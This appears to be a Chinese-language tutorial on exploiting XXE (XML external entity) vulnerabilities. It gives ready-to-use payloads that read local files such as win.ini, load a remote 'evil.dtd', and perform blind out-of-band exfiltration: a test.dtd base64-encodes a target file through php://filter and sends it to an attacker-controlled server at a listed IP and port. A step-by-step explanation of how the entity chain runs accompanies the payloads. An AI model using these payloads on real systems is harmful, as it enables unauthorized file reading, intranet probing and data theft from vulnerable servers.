漏洞攻防测试
概述
利用 xxe 漏洞可以进行拒绝服务攻击(插入DOS攻击),文件读取,命令(代码)执行(需要在编译安装php时,将命令执行模块也安装了),SQL(XSS)注入,内外扫描端口(远程包含漏洞),入侵内网站点等,内网探测和入侵是利用 xxe 中支持的协议进行内网主机和端口发现,可以理解是使用 xxe 进行 SSRF 的利用,基本上都能做
一般 xxe 利用分为两大场景:有回显和无回显。有回显的情况可以直接在页面中看到Payload 的执行结果或现象,无回显的情况又称为 blind xxe,可以使用外带数据通道提取数据。
有回显情况
<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]>
<foo>&xxe;</foo>
<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://xxx.xxx.xxx/evil.dtd" >
%xxe;]>
<foo>&evil;</foo>
外部 evil.dtd 中的内容。
<!ENTITY evil SYSTEM "file:///c:/windows/win.ini" >
无回显的情况
可以使用外带数据通道提取数据,先使用 php://filter 获取目标文件的内容,然后将内容以 http 请求发送到接受数据的服务器(攻击服务器VPS)xxx.xxx.xxx
<!DOCTYPE convert [<!ENTITY % remote SYSTEM "http://ip/test.dtd">%remote;%int;%send;]>
有报错直接查看报错信息
无报错需要访问接受数据的服务器中的日志信息,可以看到经过 base64 编码过的数据,解码后便可以得到数据。
我们清楚第看到服务器端接收到了我们用 base64 编码后的敏感文件信息(编码也
是为了不破坏原本的 XML 语法),不编码会报错
整个调用过程
我们从 payload 中能看到 连续调用了三个参数实体 %remote;%int;%send;,这就是我们的利用顺序,%remote 先调用,调用后请求远程服务器上的 test.dtd ,有点类似于将 test.dtd 包含进来,然后 %int 调用 test.dtd 中的 %file, %file 就会去获取服务器上面的敏感文件,然后将 %file 的结果填入到 %send 以后(因为实体的值中不能有 %, 所以将其转成 html 实体编码 % ),我们再调用 %send; 把我们的读取到的数据发送到我们的远程 vps 上,这样就实现了外带数据的效果,完美的解决了 XXE 无回显的问题。
test.dtd 的内容,内部的%号要进行实体编码成% (注:编码可参考:http://www.mamicode.com/info-detail-1680849.html)
<!ENTITY % file SYSTEM
"php://filter/read=convert.base64-encode/resource=file:///c:/1.txt">
<!ENTITY % int "<!ENTITY % send SYSTEM'http://192.168.0.105:8080?p=%file;'>">
